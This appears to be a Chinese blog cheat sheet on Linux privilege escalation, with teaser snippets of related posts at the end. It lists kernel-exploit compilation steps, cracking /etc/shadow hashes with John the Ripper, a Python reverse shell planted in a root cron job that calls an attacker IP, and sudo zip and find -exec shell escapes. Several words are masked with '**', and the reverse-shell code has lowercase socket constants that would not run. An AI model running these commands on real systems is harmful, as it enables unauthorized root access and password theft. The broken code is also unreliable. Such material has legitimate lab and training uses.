Linux提權思路

2021-09-26 09:39:39 字數 1624 閱讀 5421

檢視系統發行版本cat /etc/issue或者cat /etc/*-release,檢視核心資訊uname -a。根據版本資訊使用searchsploit ***來查詢發行的核心版本是否存在核心溢位漏洞,如果存在漏洞可以直接利用漏洞**來提公升許可權:

* 上傳漏洞**,使用gcc ***.c -o exploit將**編譯成名為exploit的可執行檔案

*chmod +x exploit賦予執行許可權

*./exploit執行漏洞進行提權

明文root密碼提權,檢視/etc/shadows裡面儲存密碼的hash(一般只有root許可權可讀),如果可以檢視到shadow裡面的密碼:

* 進入etc目錄下

* 使用unshadow passwd shadow >cracked

*john cracked進行破解密碼

計畫任務,系統中會存在一些定時執行的任務,可以使用cat /etc/crontab檢視定時任務,是否可以替換root定時執行的檔案來獲取root許可權。如果存在.py檔案可以使用如下python指令碼代替。攻擊機上使用nc -nlvp 4444監聽4444埠

*

#!/usr/bin/python

import socket,subprocess,os

s=socket.socket(socket.af_inet,socket.sock_stream)

s.connect(("攻擊機ip",4444))

os.dup2(s.fileno(),0)

os.dup2(s.fileno(),1);

os.dup2(s.fileno(),2);

p=subprocess.call(["/bin/bash","-i"]);

密碼復用,對靶機上的資訊進行檢視,看看是否存在一些網頁配置檔案,資料庫配置檔案。如果存在,檢視是否有賬號密碼等敏感資訊,可以嘗試靶機開放ssh服務的情況下進行遠端登入。

root提權命令,使用sudo -l可以檢視當前使用者可以執行的root提權命令,如果存在就可以使用相關命令進行提權。下面使用zip壓縮命令進行舉例:

*mkdir exp新建乙個資料夾

*sudo -u root zip exp.zip exp -t -unzip-command="sh -c /bin/bash"

*find / -name 1.txt -exec "whoami" \;find提權find / -name 1.txt -exec "/bin/sh" \;利用suid位進行提權find / -perm -u=s -type f 2>/dev/null查詢具有suid的程式進行提權。

linux下 udf提權 mysql udf提權

前言 udf user defined function 即 使用者自定義函式 檔案字尾為 dll 常用c語言編寫。通過在udf檔案中定義新函式,對mysql的功能進行擴充,可以執行系統任意命令。將mysql賬號root轉化為系統system許可權。思路 1.將udf檔案上傳到指定位置 sqlmap...

內網滲透 linux提權

查詢所有者為使用者的檔案 find type f user 使用者名稱 2 dev null 檢視帶有root許可權的suid命令 find type f perm u s 2 dev null find perm g s o perm u s type f 2 dev null type d 目錄...

Linux下提權練習

為線下awd準備 主要包括的方式 利用髒牛提權 利用searchsploit核心漏洞exp提權 利用suid 低版本nmap互動提權。其他利用方式後續補充。uname a 獲取核心版本資訊 cat etc issue 檢視發行版 利用核心版本需要 2.6.22且小於3.9 髒牛pocslink 閱讀...